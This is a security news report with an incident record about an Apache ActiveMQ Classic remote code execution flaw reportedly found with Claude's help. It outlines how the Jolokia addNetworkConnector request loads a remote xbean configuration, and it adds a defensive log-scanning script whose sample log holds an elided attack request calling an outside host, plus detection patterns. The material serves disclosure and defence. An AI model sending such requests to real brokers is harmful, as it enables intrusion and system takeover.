Apache Software Foundation: Claude Discovers 13-Year-Old RCE Vulnerability in Apache ActiveMQ Within Minutes


Critical 13-Year-Old RCE Flaw in Apache ActiveMQ Classic Discovered by AI

A newly disclosed remote code execution (RCE) vulnerability in Apache ActiveMQ Classic, tracked as CVE-2026-34197, has been uncovered after remaining hidden for over 13 years. The flaw was identified in just 10 minutes by an AI assistant, demonstrating the accelerating role of artificial intelligence in vulnerability research.

The vulnerability resides in ActiveMQ Classic’s web-based management console, which uses Jolokia, a REST API that exposes Java Management Extensions (JMX) operations. Although Jolokia was restricted to read-only access following a 2023 vulnerability, developers kept full access to ActiveMQ’s internal management components (MBeans) for functionality, which created a critical security gap.

Attackers can exploit the flaw by sending a crafted request to the Jolokia API that abuses the addNetworkConnector operation to force the broker to download a malicious remote configuration file via the vm:// protocol. When the broker processes the request, it retrieves and executes the file, granting attackers full system control. A malicious payload could include an xbean:http:// URL, triggering arbitrary code execution during connection setup.

Under normal conditions, exploitation requires administrative credentials (e.g., admin:admin). However, in ActiveMQ Classic versions 6.0.0 through 6.1.1, a separate flaw (CVE-2024-32114) unintentionally removed authentication protections from the Jolokia API, turning CVE-2026-34197 into a zero-authentication RCE vulnerability.

The discovery was made by security researcher Naveen Sunkavally using Anthropic’s Claude AI model, which analyzed the codebase to identify exposed endpoints and historical vulnerabilities. The AI’s rapid analysis, of a task that is typically a weeks-long manual process, highlights how AI is reshaping vulnerability research.

Given ActiveMQ’s history as a target for ransomware and advanced threat actors, organizations are advised to upgrade to versions 5.19.4 or 6.2.3, which remove risky vm:// transport usage in remote operations. Additional mitigations include changing default credentials, monitoring logs for suspicious vm:// URIs or brokerConfig=xbean:http patterns, and watching for unusual POST requests to /api/jolokia/ containing addNetworkConnector.
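A defender-side check for the log indicators listed above (POST to /api/jolokia/ carrying addNetworkConnector, vm:// URIs, and brokerConfig=xbean:http), added here as an example; it is not code from the article or the ActiveMQ project, and it assumes a constructed JSON-lines request log with `method`, `path` and `body` fields as a reverse proxy in front of the console might emit:

```python
import json
from typing import Dict, List

# Constructed sample log (not real traffic): one JSON record per request.
# Only the third record carries the indicators named in the advisory; the
# request payload itself is elided with "...".
SAMPLE_LOG = """\
{"ts":"2026-03-20T10:01:02Z","src":"10.0.0.5","method":"GET","path":"/api/jolokia/read/java.lang:type=Memory","status":200,"body":""}
{"ts":"2026-03-20T10:01:09Z","src":"10.0.0.5","method":"POST","path":"/api/jolokia/","status":200,"body":"{\\"type\\":\\"read\\",\\"mbean\\":\\"java.lang:type=Runtime\\"}"}
{"ts":"2026-03-20T10:02:33Z","src":"198.51.100.7","method":"POST","path":"/api/jolokia/","status":200,"body":"{\\"type\\":\\"exec\\",\\"operation\\":\\"addNetworkConnector\\",\\"arguments\\":[\\"vm://...?brokerConfig=xbean:http://198.51.100.7/...\\"]}"}
{"ts":"2026-03-20T10:03:00Z","src":"10.0.0.9","method":"POST","path":"/admin/queues.jsp","status":200,"body":"destination=orders"}
"""

def classify_request(rec: Dict) -> List[str]:
    """Return the advisory indicators that one request record matches."""
    reasons = []
    path = str(rec.get("path", ""))
    body = str(rec.get("body", ""))
    # Indicator 1: a POST to the Jolokia endpoint invoking addNetworkConnector.
    if (rec.get("method") == "POST" and path.lower().startswith("/api/jolokia")
            and "addNetworkConnector" in body):
        reasons.append("jolokia_post_addNetworkConnector")
    haystack = path + body
    # Indicator 2: a vm:// URI supplied from outside the broker.
    if "vm://" in haystack:
        reasons.append("vm_uri")
    # Indicator 3: a remote xbean broker configuration reference.
    if "brokerConfig=xbean:http" in haystack:
        reasons.append("remote_xbean_brokerConfig")
    return reasons

def scan_log(text: str) -> List[Dict]:
    """Scan JSON-lines records and return one finding per matching request."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skipped here, a real pipeline would count it
        reasons = classify_request(rec)
        if reasons:
            # All three indicators together match the exploitation pattern itself.
            severity = "critical" if len(reasons) == 3 else "suspicious"
            findings.append({"ts": rec.get("ts"), "src": rec.get("src"),
                             "reasons": reasons, "severity": severity})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```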

The incident underscores the risks of legacy code paths and the growing efficiency of AI-driven security research.

Source: https://cyberpress.org/claude-discovers-13-year-old-rce-vulnerability-in-apache-activemq-within-minutes/

The Apache Software Foundation cybersecurity rating report: https://www.rankiteo.com/company/the-apache-software-foundation

{'affected_entities': [{'customers_affected': 'Organizations using Apache '
                                              'ActiveMQ Classic versions 6.0.0 '
                                              'through 6.1.1 or those with '
                                              'default credentials',
                        'industry': 'Technology/Software Development',
                        'location': 'Global',
                        'name': 'Apache ActiveMQ Classic',
                        'type': 'Software'}],
 'attack_vector': 'Jolokia API (REST API for JMX operations)',
 'description': 'A newly disclosed remote code execution (RCE) vulnerability '
                'in Apache ActiveMQ Classic, tracked as CVE-2026-34197, has '
                'been uncovered after remaining hidden for over 13 years. The '
                'flaw was identified in just 10 minutes by an AI assistant, '
                'demonstrating the accelerating role of artificial '
                'intelligence in vulnerability research. The vulnerability '
                'resides in ActiveMQ Classic’s web-based management console, '
                'which uses Jolokia, a REST API that exposes Java Management '
                'Extensions (JMX) operations. Attackers can exploit the flaw '
                'by sending a crafted request to the Jolokia API, abusing the '
                '`addNetworkConnector` operation to force the broker to '
                'download a malicious remote configuration file via the '
                '`vm://` protocol, leading to arbitrary code execution.',
 'impact': {'brand_reputation_impact': 'Potential reputational damage due to '
                                       'exploitation by ransomware and '
                                       'advanced threat actors',
            'operational_impact': 'Full system control by attackers, potential '
                                  'for ransomware deployment or data '
                                  'exfiltration',
            'systems_affected': 'Apache ActiveMQ Classic versions 6.0.0 '
                                'through 6.1.1 (zero-authentication RCE) and '
                                'other versions with administrative access'},
 'initial_access_broker': {'entry_point': 'Jolokia API via crafted request to '
                                          '`addNetworkConnector`'},
 'investigation_status': 'Vulnerability disclosed, patches available',
 'lessons_learned': 'The incident underscores the risks of legacy code paths '
                    'and the growing efficiency of AI-driven security '
                    'research. It also highlights the importance of removing '
                    'unnecessary administrative functionalities and enforcing '
                    'strict authentication controls.',
 'post_incident_analysis': {'corrective_actions': ['Patching vulnerable '
                                                   'versions',
                                                   'Removing `vm://` transport '
                                                   'usage in remote operations',
                                                   'Enforcing strict '
                                                   'authentication controls'],
                            'root_causes': ['Legacy code path in Apache '
                                            'ActiveMQ Classic’s Jolokia API',
                                            'Unintended removal of '
                                            'authentication protections in '
                                            'versions 6.0.0 through 6.1.1 '
                                            '(CVE-2024-32114)',
                                            'Exposure of internal MBeans with '
                                            'full administrative access']},
 'recommendations': ['Upgrade to Apache ActiveMQ Classic versions 5.19.4 or '
                     '6.2.3 immediately',
                     'Change default credentials and enforce strong '
                     'authentication',
                     'Monitor logs for suspicious `vm://` URIs or '
                     '`brokerConfig=xbean:http` patterns',
                     'Watch for unusual POST requests to `/api/jolokia/` '
                     'containing `addNetworkConnector`',
                     'Consider AI-driven vulnerability research for legacy '
                     'codebases'],
 'references': [{'source': 'Security Research by Naveen Sunkavally'}],
 'response': {'containment_measures': 'Upgrade to versions 5.19.4 or 6.2.3, '
                                      'change default credentials, monitor '
                                      'logs for suspicious `vm://` URIs or '
                                      '`brokerConfig=xbean:http` patterns',
              'enhanced_monitoring': 'Monitor for unusual POST requests to '
                                     '`/api/jolokia/` containing '
                                     '`addNetworkConnector`',
              'remediation_measures': 'Remove risky `vm://` transport usage in '
                                      'remote operations, apply patches for '
                                      'CVE-2026-34197 and CVE-2024-32114'},
 'title': 'Critical 13-Year-Old RCE Flaw in Apache ActiveMQ Classic Discovered '
          'by AI',
 'type': 'Remote Code Execution (RCE)',
 'vulnerability_exploited': 'CVE-2026-34197 (13-year-old flaw in Apache '
                            'ActiveMQ Classic) and CVE-2024-32114 '
                            '(authentication bypass)'}